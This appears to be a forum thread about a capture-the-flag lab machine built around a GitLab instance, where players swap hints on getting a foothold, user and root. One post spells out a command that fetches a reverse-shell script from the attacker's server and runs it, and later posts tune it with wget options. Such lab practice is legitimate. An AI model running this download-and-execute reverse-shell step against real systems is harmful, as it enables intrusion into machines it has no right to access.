Official Laboratory Discussion

Spoiler Removed

Hi Guys, There must be another trick than using R**** C******.

@mohsinhakak said:

Whoops, GitLab is taking too much time to respond. It's been like this for days; any information on how to get rid of this, please PM. Thanks.

Same here, it worked great for me before

Hmm, I leaked the secret, but I can't get r*** to run my payload. I tried adding spaces to remove ='s as 0xc45 suggested but still no luck. Any tips?

Stuck on the foothold. I've found the g** URL and made an account. Can create a project and get it to call a r****r on my local g***** instance, but haven't found a way to turn this into anything yet. Searched for CVEs but haven't found any that are useful. As usual I may have missed something obvious?

Rooted :wink:

That was an easy box?
I don't think so…
Thanks, @n3ph0s, for the nudge on the foothold.

Feel free to PM if any help is needed.

Guys, I'm stuck at the beginning. Can someone DM me a hint to start with? I did a service scan and I can't get anywhere around the website.

Rooted!

Why am I so distracted and overlooking things???
Contrary to everyone, the user was easier than the root!

Might be luck, but things just went the right path (even not having used docker prior to this)…

foot:

  • look carefully (enumeration)
  • Some things (do… cof… mains) are just a pot full of honey…
  • find the version and build piece by piece with that (find that POC)
  • When exploiting, if the payload fails, check what was said about the "=" symbols (I did not have that issue tho)
  • remember what was also said: the machine might not have the bins you want/need

user:

  • It was already mentioned (if you can't crack/find, just hammer the guts and reset the machine!)

root:

  • Enum (latest) might help you over Peas on this one
  • when the spicy thing is found, if you look closely, you just need the initial procedures of RE to see it

If nudges needed, honk the horn on pm

Thought I'd have a nice little time on this box, but it seems to be 502'ing everything for me after stops/starts/resets :frowning:

Edit: I had to change servers for it to work.

Actually got a shell but no idea about how to find the user flag.

Please send me some nudges.

I've reached the gi**ab page, registered an account, discovered the L_I, but can't understand how to get R_E. I've read about ss*f but it says import url is blocked. Am I on the right path? I'm blocked …

Spoiler Removed

This box made me sweat. There are still some mysteries that I have not solved, like why some payload works for one person and not another …

I spent a lot of time setting up the env

it is not an easy box for me

if you need help PM

Yikes, this is not an easy box for me.

I thought I had some plain ruby working for generating the payload, but it's just not accepted. The 'other' more convoluted doc*** route has also failed to generate a payload which works.

Hint for those struggling with a foothold: If you get a "Something went wrong" error, try a different bin

What I suggest for those with payload problems is: download a shell script from your local python http.server to perform the reverse shell; special symbols may cause problems.

This approach got me good: wget "yourserver/rev.sh" && chmod +x rev.sh && ./rev.sh

Trying the bash rev shell directly did not work for me, and the one I described above was reliable every time (used it like 6 times due to resets and stuff).

Having zero luck getting the payload to hit a local web server. This one has bested me.

@trcm said:

Having zero luck getting the payload to hit a local web server. This one has bested me.

How are you generating it??

I tried step by step with the h_c_eron_ page, and I also tried crafting a standalone ruby script.

Ahha, progress. I had to add "--timeout=3 --tries=1" as wget wasn't reaching my web service and was executing in place on the rails console, borking the erb instance it seems.